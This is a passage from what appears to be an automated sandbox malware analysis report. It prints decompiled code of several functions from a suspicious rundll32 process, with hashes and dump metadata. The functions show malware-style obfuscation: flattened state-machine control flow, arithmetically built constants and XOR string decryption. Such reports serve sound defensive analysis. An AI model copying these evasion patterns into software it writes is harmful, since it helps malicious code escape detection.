                                                                                                                      				_v540 = 0x951329;
                                                                                                                      				_v540 = _v540 ^ 0x02360ba7;
                                                                                                                      				_v540 = _v540 ^ 0x02aaf891;
                                                                                                                      				_v564 = 0x7a8127;
                                                                                                                      				_v564 = _v564 | 0x4a3ea7d2;
                                                                                                                      				_v564 = _v564 * 0x6d;
                                                                                                                      				_v564 = _v564 + 0xffffd056;
                                                                                                                      				_v564 = _v564 ^ 0xb7eba97a;
                                                                                                                      				_v532 = 0x65650b;
                                                                                                                      				_t97 = _v532 * 5;
                                                                                                                      				_v532 = _t97;
                                                                                                                      				_v532 = _v532 ^ 0x01f4ff6f;
                                                                                                                      				do {
                                                                                                                      					while(_t105 != 0xb436d6) {
                                                                                                                      						if(_t105 == 0x2c7b739) {
                                                                                                                      							_t100 =  *0x19520c; // 0x0
                                                                                                                      							__eflags = _t100 + 0x220;
                                                                                                                      							return E001808A0(_t117, _v540, _v564, _t100 + 0x220, _v532);
                                                                                                                      						}
                                                                                                                      						if(_t105 == 0x687a68b) {
                                                                                                                      							_t105 = 0xdf97892;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t125 = _t105 - 0xdf97892;
                                                                                                                      						if(_t105 != 0xdf97892) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						_t97 = E001912A8(_t105, _v560, _t125, _v552, _v524,  &_v520);
                                                                                                                      						_t119 =  &(_t119[3]);
                                                                                                                      						_t105 = 0xb436d6;
                                                                                                                      					}
                                                                                                                      					_v544 = 0xaf74ff;
                                                                                                                      					_v544 = _v544 + 0xc134;
                                                                                                                      					_v544 = _v544 ^ 0x00b03631;
                                                                                                                      					_t99 = E0018BA68(_v548, _v536, _v556,  &_v520, _v528);
                                                                                                                      					_t119 =  &(_t119[3]);
                                                                                                                      					_t117 =  &_v520 + _t99 * 2;
                                                                                                                      					while(1) {
                                                                                                                      						_t97 =  &_v520;
                                                                                                                      						__eflags = _t117 - _t97;
                                                                                                                      						if(_t117 <= _t97) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						__eflags =  *_t117 - 0x5c;
                                                                                                                      						if( *_t117 != 0x5c) {
                                                                                                                      							L10:
                                                                                                                      							_t117 = _t117 - 2;
                                                                                                                      							__eflags = _t117;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t85 =  &_v544;
                                                                                                                      						 *_t85 = _v544 - 1;
                                                                                                                      						__eflags =  *_t85;
                                                                                                                      						if( *_t85 == 0) {
                                                                                                                      							__eflags = _t117;
                                                                                                                      							L14:
                                                                                                                      							_t105 = 0x2c7b739;
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					goto L14;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t105 - 0x787a9f3;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t97;
                                                                                                                      			}
                                                                                                                      0x0017e9c0
                                                                                                                      0x0017e9c2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017e9d5
                                                                                                                      0x0017e9da
                                                                                                                      0x0017e9dd
                                                                                                                      0x0017e9dd
                                                                                                                      0x0017e9e5
                                                                                                                      0x0017e9f1
                                                                                                                      0x0017e9f9
                                                                                                                      0x0017ea12
                                                                                                                      0x0017ea1b
                                                                                                                      0x0017ea1e
                                                                                                                      0x0017ea32
                                                                                                                      0x0017ea32
                                                                                                                      0x0017ea36
                                                                                                                      0x0017ea38
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017ea23
                                                                                                                      0x0017ea27
                                                                                                                      0x0017ea2f
                                                                                                                      0x0017ea2f
                                                                                                                      0x0017ea2f
                                                                                                                      0x00000000
                                                                                                                      0x0017ea2f
                                                                                                                      0x0017ea29
                                                                                                                      0x0017ea29
                                                                                                                      0x0017ea29
                                                                                                                      0x0017ea2d
                                                                                                                      0x0017ea3c
                                                                                                                      0x0017ea3f
                                                                                                                      0x0017ea3f
                                                                                                                      0x00000000
                                                                                                                      0x0017ea3f
                                                                                                                      0x00000000
                                                                                                                      0x0017ea2d
                                                                                                                      0x00000000
                                                                                                                      0x0017ea41
                                                                                                                      0x0017ea41
                                                                                                                      0x0017ea41
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 33L
                                                                                                                      • API String ID: 0-1382935120
                                                                                                                      • Opcode ID: c0cee2f80a81a1684c47bdc2085d9f3068923399ad0c4a311bb5de24e51d5c3c
                                                                                                                      • Instruction ID: 34387c71a654fb63ebfe9cd95c499e8d7c1d8167e1c1746c5bf3a2c0f9d8c5c0
                                                                                                                      • Opcode Fuzzy Hash: c0cee2f80a81a1684c47bdc2085d9f3068923399ad0c4a311bb5de24e51d5c3c
                                                                                                                      • Instruction Fuzzy Hash: CB5134715083419BC798DF24C58542FBBF4FBC8758F909A5DF99A96220D370DA49CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00180D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t64;
                                                                                                                      				void* _t81;
                                                                                                                      				void* _t85;
                                                                                                                      				signed int _t94;
                                                                                                                      				signed int _t95;
                                                                                                                      				void* _t97;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t64);
                                                                                                                      				_v20 = 0xc35745;
                                                                                                                      				_t97 = 0;
                                                                                                                      				_t81 = 0xe709e41;
                                                                                                                      				_t94 = 0x4c;
                                                                                                                      				_v20 = _v20 / _t94;
                                                                                                                      				_v20 = _v20 ^ 0x00058dee;
                                                                                                                      				_v24 = 0xf1d8fd;
                                                                                                                      				_v24 = _v24 + 0xffffe7cd;
                                                                                                                      				_v24 = _v24 + 0xffff1b1a;
                                                                                                                      				_v24 = _v24 << 0xc;
                                                                                                                      				_v24 = _v24 ^ 0x0dbd879b;
                                                                                                                      				_v28 = 0xdb2a24;
                                                                                                                      				_v28 = _v28 + 0x4b2b;
                                                                                                                      				_v28 = _v28 | 0xa0f26509;
                                                                                                                      				_v28 = _v28 + 0x79c0;
                                                                                                                      				_v28 = _v28 ^ 0xa0fe0b2f;
                                                                                                                      				_v4 = 0xb750f2;
                                                                                                                      				_v4 = _v4 >> 0xe;
                                                                                                                      				_v4 = _v4 ^ 0x000727f7;
                                                                                                                      				_v8 = 0x72e718;
                                                                                                                      				_t95 = 0x6b;
                                                                                                                      				_v8 = _v8 / _t95;
                                                                                                                      				_v8 = _v8 ^ 0x00056d3a;
                                                                                                                      				_v12 = 0x47eeb9;
                                                                                                                      				_v12 = _v12 + 0xffffe987;
                                                                                                                      				_v12 = _v12 ^ 0x0043781c;
                                                                                                                      				_v16 = 0xdf1994;
                                                                                                                      				_v16 = _v16 + 0xffff4376;
                                                                                                                      				_v16 = _v16 ^ 0x00d54791;
                                                                                                                      				do {
                                                                                                                      					while(_t81 != 0x3b92be8) {
                                                                                                                      						if(_t81 == 0x73b901c) {
                                                                                                                      							E00193672();
                                                                                                                      							_t81 = 0xe212545;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t81 == 0x9bcb632) {
                                                                                                                      								if(E0018ACD3(_a8) != 0) {
                                                                                                                      									_t97 = 1;
                                                                                                                      								} else {
                                                                                                                      									_t81 = 0x73b901c;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t81 == 0xe212545) {
                                                                                                                      									E001768DE(_v4, _v8, _v12, _v16,  *0x195c9c);
                                                                                                                      								} else {
                                                                                                                      									if(_t81 != 0xe709e41) {
                                                                                                                      										goto L13;
                                                                                                                      									} else {
                                                                                                                      										_push(_t81);
                                                                                                                      										_push(_t81);
                                                                                                                      										_t85 = 0x60;
                                                                                                                      										 *0x195c9c = E00183512(_t85);
                                                                                                                      										_t81 = 0x3b92be8;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L17:
                                                                                                                      						return _t97;
                                                                                                                      					}
                                                                                                                      					if(E00179A7D(_a12) == 0) {
                                                                                                                      						_t81 = 0xe212545;
                                                                                                                      						goto L13;
                                                                                                                      					} else {
                                                                                                                      						_t81 = 0x9bcb632;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L17;
                                                                                                                      					L13:
                                                                                                                      				} while (_t81 != 0xf0e3ed);
                                                                                                                      				goto L17;
                                                                                                                      			}
















                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +K
                                                                                                                      • API String ID: 0-3601299342
                                                                                                                      • Opcode ID: fa304b436ff796c5d4f257d5a9ba8273cb8b3f26ea76a38e1695c0133bf9e532
                                                                                                                      • Instruction ID: f12e3336cd127f8d374f45d51a3e3b8a8d4630ca1900b3360a2d2b69de95e5d8
                                                                                                                      • Opcode Fuzzy Hash: fa304b436ff796c5d4f257d5a9ba8273cb8b3f26ea76a38e1695c0133bf9e532
                                                                                                                      • Instruction Fuzzy Hash: 3541EF72608301DBD799EF24C84552FBBE2EBE8318F508E1DF59656260D770CA49CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E0017AB66(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t42;
                                                                                                                      				signed int _t46;
                                                                                                                      				short* _t63;
                                                                                                                      				signed int _t64;
                                                                                                                      				signed int _t66;
                                                                                                                      				signed int _t74;
                                                                                                                      				unsigned int _t75;
                                                                                                                      				unsigned int _t76;
                                                                                                                      				short* _t79;
                                                                                                                      				signed int* _t80;
                                                                                                                      				signed int* _t81;
                                                                                                                      				signed int* _t82;
                                                                                                                      				unsigned int _t84;
                                                                                                                      				void* _t90;
                                                                                                                      				short _t92;
                                                                                                                      				void* _t94;
                                                                                                                      				void* _t95;
                                                                                                                      
                                                                                                                      				_t82 =  *(_t94 + 0x1c);
                                                                                                                      				_push( *(_t94 + 0x28));
                                                                                                                      				_push( *(_t94 + 0x28));
                                                                                                                      				_push(_t82);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t42);
                                                                                                                      				 *(_t94 + 0x24) = 0xc8fa9a;
                                                                                                                      				_t80 =  &(_t82[1]);
                                                                                                                      				 *(_t94 + 0x24) =  *(_t94 + 0x24) + 0x149f;
                                                                                                                      				 *(_t94 + 0x24) =  *(_t94 + 0x24) ^ 0x00c381cf;
                                                                                                                      				 *(_t94 + 0x34) = 0x8cac1;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) | 0xffff7fdf;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0xfffda11e;
                                                                                                                      				 *(_t94 + 0x20) = 0x3c356c;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) * 0x2a;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x83f9;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09ee4754;
                                                                                                                      				_t66 =  *_t82;
                                                                                                                      				_t81 =  &(_t80[1]);
                                                                                                                      				_t46 =  *_t80 ^ _t66;
                                                                                                                      				 *(_t94 + 0x28) = _t66;
                                                                                                                      				 *(_t94 + 0x2c) = _t46;
                                                                                                                      				_t24 = _t46 + 1; // 0x3c356d
                                                                                                                      				_t84 =  !=  ? (_t24 & 0xfffffffc) + 4 : _t24;
                                                                                                                      				_t95 = _t94 + 0xc;
                                                                                                                      				_t63 = E00183512(_t84 + _t84);
                                                                                                                      				 *((intOrPtr*)(_t95 + 0x28)) = _t63;
                                                                                                                      				if(_t63 != 0) {
                                                                                                                      					_t92 = 0;
                                                                                                                      					_t79 = _t63;
                                                                                                                      					_t90 =  >  ? 0 :  &(_t81[_t84 >> 2]) - _t81 + 3 >> 2;
                                                                                                                      					if(_t90 != 0) {
                                                                                                                      						_t64 =  *(_t95 + 0x18);
                                                                                                                      						do {
                                                                                                                      							_t74 =  *_t81;
                                                                                                                      							_t81 =  &(_t81[1]);
                                                                                                                      							_t75 = _t74 ^ _t64;
                                                                                                                      							 *_t79 = _t75 & 0x000000ff;
                                                                                                                      							_t79 = _t79 + 8;
                                                                                                                      							 *((short*)(_t79 - 6)) = _t75 >> 0x00000008 & 0x000000ff;
                                                                                                                      							_t76 = _t75 >> 0x10;
                                                                                                                      							_t92 = _t92 + 1;
                                                                                                                      							 *((short*)(_t79 - 4)) = _t76 & 0x000000ff;
                                                                                                                      							 *((short*)(_t79 - 2)) = _t76 >> 0x00000008 & 0x000000ff;
                                                                                                                      						} while (_t92 < _t90);
                                                                                                                      						_t63 =  *((intOrPtr*)(_t95 + 0x24));
                                                                                                                      					}
                                                                                                                      					 *((short*)(_t63 +  *(_t95 + 0x1c) * 2)) = 0;
                                                                                                                      				}
                                                                                                                      				return _t63;
                                                                                                                      			}





















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TG
                                                                                                                      • API String ID: 0-2762469129
                                                                                                                      • Opcode ID: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction ID: 6b0ad609b8cbef9db2e460dfb43ff31e1c459dc74e6199dfb61229c1d9851022
                                                                                                                      • Opcode Fuzzy Hash: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction Fuzzy Hash: AB317C726097119BC714DF28C48546AFBE0FF88728F454B2DF889A7250D774EA09CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0018109E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t76;
                                                                                                                      				void* _t82;
                                                                                                                      				void* _t83;
                                                                                                                      				signed int _t85;
                                                                                                                      				signed int _t86;
                                                                                                                      				signed int _t87;
                                                                                                                      				void* _t96;
                                                                                                                      				void* _t97;
                                                                                                                      				signed int* _t99;
                                                                                                                      
                                                                                                                      				_t99 =  &_v28;
                                                                                                                      				_v24 = 0xd283c4;
                                                                                                                      				_v24 = _v24 >> 8;
                                                                                                                      				_v24 = _v24 << 9;
                                                                                                                      				_t83 = __ecx;
                                                                                                                      				_t96 = 0;
                                                                                                                      				_t85 = 0x2d;
                                                                                                                      				_v24 = _v24 / _t85;
                                                                                                                      				_v24 = _v24 ^ 0x0004da81;
                                                                                                                      				_t97 = 0xc7350e4;
                                                                                                                      				_v16 = 0x64139d;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x00062b71;
                                                                                                                      				_v28 = 0xade301;
                                                                                                                      				_v28 = _v28 ^ 0x8f618bae;
                                                                                                                      				_v28 = _v28 >> 4;
                                                                                                                      				_t86 = 0x7e;
                                                                                                                      				_v28 = _v28 / _t86;
                                                                                                                      				_v28 = _v28 ^ 0x001433c5;
                                                                                                                      				_v20 = 0x6fd8b7;
                                                                                                                      				_v20 = _v20 << 5;
                                                                                                                      				_t87 = 0x39;
                                                                                                                      				_v20 = _v20 / _t87;
                                                                                                                      				_v20 = _v20 ^ 0x003ef69f;
                                                                                                                      				_v4 = 0x5f989c;
                                                                                                                      				_v4 = _v4 + 0xda74;
                                                                                                                      				_v4 = _v4 ^ 0x006bc492;
                                                                                                                      				_v12 = 0x987d41;
                                                                                                                      				_v12 = _v12 << 9;
                                                                                                                      				_v12 = _v12 + 0x3c41;
                                                                                                                      				_v12 = _v12 ^ 0x30fa219f;
                                                                                                                      				_v8 = 0x945ab1;
                                                                                                                      				_v8 = _v8 >> 2;
                                                                                                                      				_v8 = _v8 ^ 0x002dcc5b;
                                                                                                                      				do {
                                                                                                                      					while(_t97 != 0xa0feddc) {
                                                                                                                      						if(_t97 == 0xc7350e4) {
                                                                                                                      							_t97 = 0xf55d56d;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t97 == 0xf55d56d) {
                                                                                                                      								_t82 = E0018274F();
                                                                                                                      								_t99 = _t99 - 0xc + 0xc;
                                                                                                                      								_t97 = 0xa0feddc;
                                                                                                                      								_t96 = _t96 + _t82;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L7;
                                                                                                                      					}
                                                                                                                      					_t76 = E0017B782(_t83 + 4, _v4, _v12, _v8);
                                                                                                                      					_t99 =  &(_t99[2]);
                                                                                                                      					_t97 = 0x490b4c9;
                                                                                                                      					_t96 = _t96 + _t76;
                                                                                                                      					L7:
                                                                                                                      				} while (_t97 != 0x490b4c9);
                                                                                                                      				return _t96;
                                                                                                                      			}



















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A<
                                                                                                                      • API String ID: 0-2278821948
                                                                                                                      • Opcode ID: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction ID: 303598970bb7164440f269743456dacc993a9ed279e13203cd6e0a34fd3de25f
                                                                                                                      • Opcode Fuzzy Hash: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction Fuzzy Hash: 93318C729083019FC304DE25D84941BBBE1FBE4B58F158A2DF588AB260D3B5DE08CB97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E00178650(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				void* _t83;
                                                                                                                      				signed int _t102;
                                                                                                                      				signed int _t103;
                                                                                                                      				signed int _t104;
                                                                                                                      				signed int _t105;
                                                                                                                      				void* _t118;
                                                                                                                      				signed int _t119;
                                                                                                                      
                                                                                                                      				_push(_a4);
                                                                                                                      				_t118 = __edx;
                                                                                                                      				_push(__edx);
                                                                                                                      				E0017CF25(_t83);
                                                                                                                      				_v36 = _v36 & 0x00000000;
                                                                                                                      				_v32 = _v32 & 0x00000000;
                                                                                                                      				_v40 = 0x27bdd4;
                                                                                                                      				_v24 = 0x769f2a;
                                                                                                                      				_v24 = _v24 << 1;
                                                                                                                      				_v24 = _v24 ^ 0x00e6321c;
                                                                                                                      				_v8 = 0xfef45c;
                                                                                                                      				_t102 = 0x31;
                                                                                                                      				_v8 = _v8 / _t102;
                                                                                                                      				_v8 = _v8 | 0xf1ae833d;
                                                                                                                      				_v8 = _v8 ^ 0x9231f40a;
                                                                                                                      				_v8 = _v8 ^ 0x6392d2fe;
                                                                                                                      				_v16 = 0x3d43fb;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x97e6d5b2;
                                                                                                                      				_v16 = _v16 ^ 0x97eefe03;
                                                                                                                      				_v12 = 0x33c712;
                                                                                                                      				_v12 = _v12 >> 7;
                                                                                                                      				_v12 = _v12 + 0x2d9c;
                                                                                                                      				_t103 = 0x16;
                                                                                                                      				_v12 = _v12 / _t103;
                                                                                                                      				_v12 = _v12 ^ 0x00054cf8;
                                                                                                                      				_v28 = 0xb0e606;
                                                                                                                      				_v28 = _v28 | 0xfcdd39f2;
                                                                                                                      				_v28 = _v28 * 0x19;
                                                                                                                      				_v28 = _v28 ^ 0xb4c190eb;
                                                                                                                      				E00175AE2(_t103);
                                                                                                                      				_v24 = 0x8c0b06;
                                                                                                                      				_v24 = _v24 + 0x3875;
                                                                                                                      				_v24 = _v24 ^ 0xc8b8cfa1;
                                                                                                                      				_v24 = _v24 ^ 0xc8348cde;
                                                                                                                      				_v20 = 0xa003e6;
                                                                                                                      				_t104 = 0x69;
                                                                                                                      				_v20 = _v20 / _t104;
                                                                                                                      				_t105 = 0x51;
                                                                                                                      				_v20 = _v20 / _t105;
                                                                                                                      				_v20 = _v20 ^ 0x000004c1;
                                                                                                                      				_t119 = E0017EF71(_v24, _v20);
                                                                                                                      				_push(_t119);
                                                                                                                      				_push(_v28);
                                                                                                                      				_push(_t118);
                                                                                                                      				E00175A07(1, _v12);
                                                                                                                      				 *((short*)(_t118 + _t119 * 2)) = 0;
                                                                                                                      				return 0;
                                                                                                                      			}



















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: u8
                                                                                                                      • API String ID: 0-999499730
                                                                                                                      • Opcode ID: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction ID: 0f1727d06a53580a55a51100f84a42b46455b5f2fbfc863dd68ec8cf4959fd66
                                                                                                                      • Opcode Fuzzy Hash: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction Fuzzy Hash: AC311371D00209EBDB09CFA5C98AAEFBBB2FF44314F208099E515B62A0D7B55B54CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0017EC9B(void* __ecx, signed int __edx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _t99;
                                                                                                                      				intOrPtr _t104;
                                                                                                                      				signed int _t114;
                                                                                                                      				signed int _t115;
                                                                                                                      				signed int _t116;
                                                                                                                      
                                                                                                                      				_v52 = _v52 & 0x00000000;
                                                                                                                      				_v48 = _v48 & 0x00000000;
                                                                                                                      				_v56 = 0x52d5fa;
                                                                                                                      				_v32 = 0xd2ae86;
                                                                                                                      				_v32 = _v32 >> 6;
                                                                                                                      				_v32 = _v32 ^ 0x0000dff8;
                                                                                                                      				_v8 = 0x945d31;
                                                                                                                      				_v8 = _v8 >> 9;
                                                                                                                      				_v8 = _v8 | 0xfea629bb;
                                                                                                                      				_t114 = __edx;
                                                                                                                      				_v8 = _v8 * 0x68;
                                                                                                                      				_v8 = _v8 ^ 0x739e55b5;
                                                                                                                      				_v16 = 0xe343a6;
                                                                                                                      				_v16 = _v16 + 0xffffaeee;
                                                                                                                      				_v16 = _v16 << 0xd;
                                                                                                                      				_v16 = _v16 ^ 0x5e55869e;
                                                                                                                      				_v28 = 0xa35055;
                                                                                                                      				_v28 = _v28 ^ 0xccdb3a8a;
                                                                                                                      				_v28 = _v28 ^ 0xcc747f7c;
                                                                                                                      				_v12 = 0x417a71;
                                                                                                                      				_t115 = 0xc;
                                                                                                                      				_v12 = _v12 / _t115;
                                                                                                                      				_v12 = _v12 + 0xffffd743;
                                                                                                                      				_v12 = _v12 ^ 0x254bb370;
                                                                                                                      				_v12 = _v12 ^ 0x25474737;
                                                                                                                      				_v36 = 0x5ce014;
                                                                                                                      				_v36 = _v36 << 0xb;
                                                                                                                      				_v36 = _v36 ^ 0xe70ab788;
                                                                                                                      				_v20 = 0x24db01;
                                                                                                                      				_t116 = 0x63;
                                                                                                                      				_v20 = _v20 * 0x3c;
                                                                                                                      				_v20 = _v20 + 0xe28f;
                                                                                                                      				_v20 = _v20 ^ 0x08ab7f21;
                                                                                                                      				_v44 = 0x4977db;
                                                                                                                      				_v44 = _v44 * 0x38;
                                                                                                                      				_v44 = _v44 ^ 0x1015e45e;
                                                                                                                      				_v24 = 0xa0027c;
                                                                                                                      				_v24 = _v24 | 0xcfe9110c;
                                                                                                                      				_v24 = _v24 + 0xffff4bac;
                                                                                                                      				_v24 = _v24 ^ 0xcfe5f801;
                                                                                                                      				_v40 = 0x81bf9e;
                                                                                                                      				_v40 = _v40 / _t116;
                                                                                                                      				_v40 = _v40 ^ 0x000d137a;
                                                                                                                      				_push(_v28);
                                                                                                                      				_push(_v16);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t99 = E001907D7(_v12, _v36, E0017AB66(_v32, _v8, _v40), _v20);
                                                                                                                      				_t104 =  *0x195c8c; // 0x0
                                                                                                                      				 *((intOrPtr*)(_t104 + 4 + _t114 * 4)) = _t99;
                                                                                                                      				return E0017AE03(_v44, _v24, _v40, _t98);
                                                                                                                      			}






















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7GG%
                                                                                                                      • API String ID: 0-3444672964
                                                                                                                      • Opcode ID: 67213d0398122c332fb1127b40eed38b5183a67bcdaa070641fd5e009b8b9aa1
                                                                                                                      • Instruction ID: 197519e42ce5ff7423823914888ccc77b0ab1ec4f301c95adfac82792490d164
                                                                                                                      • Opcode Fuzzy Hash: 67213d0398122c332fb1127b40eed38b5183a67bcdaa070641fd5e009b8b9aa1
                                                                                                                      • Instruction Fuzzy Hash: 9541EFB1C01219AFCB08CFE5C98A9DEBBB1FB48314F208199D511BA260C7B51A46CFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00183512(void* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
